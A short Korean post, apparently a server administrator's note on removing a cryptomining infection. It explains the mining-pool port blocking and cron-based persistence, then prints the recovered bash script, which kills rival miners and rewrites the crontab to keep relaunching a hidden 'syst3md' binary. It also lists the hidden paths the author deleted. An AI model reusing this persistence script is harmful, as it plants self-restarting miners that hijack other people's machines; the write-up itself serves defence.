프로세스 파악은 기본이니 생략
파악 되었으면, 포트 확인하고, 네트워크 포트 부터 막는다.
경험상 web을 통해 소스를 받고, ps가 죽으면 web에서 다시 소스를 받아서 설치하거나, 소스 삭제를 못 하게 해놓는다.
당장 마이닝허브 포트 부터 차단하면 로드 상승은 멈추게 된다.
다시 시작 및 체크는 cron으로 돌리는 것이고 cron도 삭제를 못 하게 해놓았다.
돌리는 소스를 최종적으로 파악 한 내용은 아래와 같다.
#!/bin/bash sleeptime=5 killminers() { pkill obama1 pkill playstation
pkill xmrig ?pkill java pkill cnrig } hook1location=`cat /var/tmp/.apachee/.hook1location` apachelogslocation=`cat /var/tmp/.apachee/.apachelogslocation`
while : do ?killminers ?if ! crontab -l | grep -q 'cronstart'; ?then ?
?rm -rf .tempo ??echo "* * * * * ${hook1location} > /dev/null <&1 2>&1 & disown" >> .tempo ??sleep 1 ??echo "@monthly ${hook1location} > /dev/null <&1 2>&1 &
disown" >> .tempo ??sleep 1 ??echo "@reboot ${apachelogslocation} > /dev/null <&1 2>&1 & disown" >> .tempo ??crontab .tempo ??rm -rf .tempo ?fi ? ?if !
pgrep -x syst3md > /dev/null ?then ??$hook1location > /dev/null <&1 2>&1 &
disown ?fi ?sleep $sleeptime done ./apachelogs
/var/tmp/.apachee
/usr/bin/.ICE-unix/.k/.auth/syst3md
/tmp/.ICE-unix/.k/.auth/syst3md
다 찾아서 없앴다.
ㅋㅋ
댐벼라~